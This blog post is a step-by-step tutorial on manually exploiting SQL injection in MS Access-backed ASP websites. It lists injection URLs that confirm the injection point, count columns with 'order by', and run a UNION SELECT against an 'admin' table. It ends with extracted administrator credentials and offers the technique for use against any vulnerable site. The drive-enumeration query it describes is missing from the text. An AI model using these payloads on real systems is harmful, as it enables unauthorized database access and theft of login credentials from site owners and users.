Hi readers! After along gap I'm going to share an interesting & useful tutorial with you all. I will be demonstrating how to manually exploit MS Access websites vulnerable to sql Injection. So let's get started !
Things Required !
- - Vulnerable website
Step By Step Guide
- Let's assume we found an vulnerable website xyz.com!.
- Now our first job will be to confirm that the error is valid! because every error doesn't means its vulnerable to sql injection.
http://www.xyz.com/vuln.asp?code=266 and 1=1# -> This URL will load normally without any errors as 1 is always equal to 1 (simple mathematics).
http://www.xyz.com/vuln.asp?code=266 and 1=2# -> This URL will not Load normally as 1 is not equal to 2.
So now by observing the behaviour we can say that yes! the URL is a correct injection point. Let's now proceed with our next step.
- After we have validated that its an valid injection point, now lets find out the drives available on the target system.
Now notice the output!. If the output is - "Could not find file 'd:\.mdb'." then this means Yes!! there is an drive d: & if the out is " 'l:\.mdb' is not a valid path" then this means there is no drive l: . So to find all the drive names we will keep on replacing "d" from the above query to a,b,c..& so on.
- Our next step will be to find the number of columns. To find the number of columns we will use the following query - "order by x# "
- http://www.xyz.com/vuln.asp?code=266 order by 6# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 7# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 8# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 9# - Error! (Throws an Error)
So now as we have noticed till 8 the page loads normally & on 9 its throwing an error, this means the number of columns are 8 !.
- After we have found the number of columns our next work is to guess the Table name!. Here is the most difficult part because guessing the Table name ain't easy!. Here you can take help of Google to find some of the standard Table names. Anyways here in my case the table name was admin (Lucky eeh!),
Our next query will be - "and 1=2 union all select 1,2,3,4,5,6,7,8 from admin#"
- http://www.xyz.com/vuln.asp?code=266 and 1=2 union all select 1,2,3,4,5,6,7,8 from admin#
Now by executing the above query it will throw out the vulnerable column number! As you can see in the above image the vulnerable columns are 2,4 & 3.
- Once we have got the vulnerable columns! now its time to guess the column names. As my table name is admin so guessing the column names is not a difficult task as normally the columns for admin are id, username, password, email etc.
so now we will be injecting the column name inside the vulnerable column number which we extracted in our previous step.
http://www.xyz.com/vuln.asp?code=266 and 1=2 union all select 1,id,username,password,5,6,7,8 from admin#
id - 1
username - 1775urp2
password - 8=Ogmlq"
- Finally you are done.. admin username & password extracted!. Happy Learning!
Manual MSAccess SQL Injection Tutorial | Microsoft JET Database Engine error '80004005'
Reviewed by Rishal Dwivedi
on
01:40
Rating:
No comments: